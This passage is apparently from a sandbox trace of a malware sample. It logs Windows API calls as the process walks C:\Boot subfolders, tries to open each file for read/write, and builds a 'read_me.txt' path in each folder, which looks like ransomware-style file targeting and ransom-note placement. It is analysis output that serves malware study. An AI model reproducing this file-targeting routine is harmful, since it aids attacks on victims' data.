dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.990] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.990] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.990] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\read_me.txt") returned 29 [0074.990] GetProcessHeap () returned 0x4f10000 [0074.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0074.990] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 7 [0074.990] GetProcessHeap () returned 0x4f10000 [0074.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0074.997] GetProcessHeap () returned 0x4f10000 [0074.997] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.998] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0074.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.998] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0074.998] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.999] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0074.999] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.999] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0074.999] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.999] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.999] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.999] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt") returned 29 [0074.999] GetProcessHeap () returned 0x4f10000 [0074.999] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0074.999] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 8 [0074.999] GetProcessHeap () returned 0x4f10000 [0074.999] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.002] GetProcessHeap () returned 0x4f10000 [0075.002] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.002] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0075.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.002] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0075.002] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.002] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0075.002] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0075.002] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0075.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.002] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0075.002] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0075.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.003] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0075.003] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0075.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.003] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0075.003] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0075.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.003] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0075.003] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0075.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.003] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0075.003] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.004] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\read_me.txt") returned 29 [0075.004] GetProcessHeap () returned 0x4f10000 [0075.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.004] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 9 [0075.004] GetProcessHeap () returned 0x4f10000 [0075.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.008] GetProcessHeap () returned 0x4f10000 [0075.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.008] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0075.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.009] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0075.009] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.009] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0075.009] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.009] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0075.009] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.009] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.009] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.010] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt") returned 29 [0075.010] GetProcessHeap () returned 0x4f10000 [0075.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.010] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 10 [0075.010] GetProcessHeap () returned 0x4f10000 [0075.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.012] GetProcessHeap () returned 0x4f10000 [0075.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.012] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0075.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.013] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0075.013] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.013] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0075.013] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.013] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0075.013] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.013] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.013] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.013] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt") returned 29 [0075.013] GetProcessHeap () returned 0x4f10000 [0075.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.013] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 11 [0075.013] GetProcessHeap () returned 0x4f10000 [0075.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.016] GetProcessHeap () returned 0x4f10000 [0075.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.016] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0075.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.017] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0075.017] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.017] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0075.017] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.017] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0075.017] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.017] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.017] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.017] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\read_me.txt") returned 29 [0075.017] GetProcessHeap () returned 0x4f10000 [0075.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.017] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 12 [0075.017] GetProcessHeap () returned 0x4f10000 [0075.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.020] GetProcessHeap () returned 0x4f10000 [0075.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.020] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0075.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, 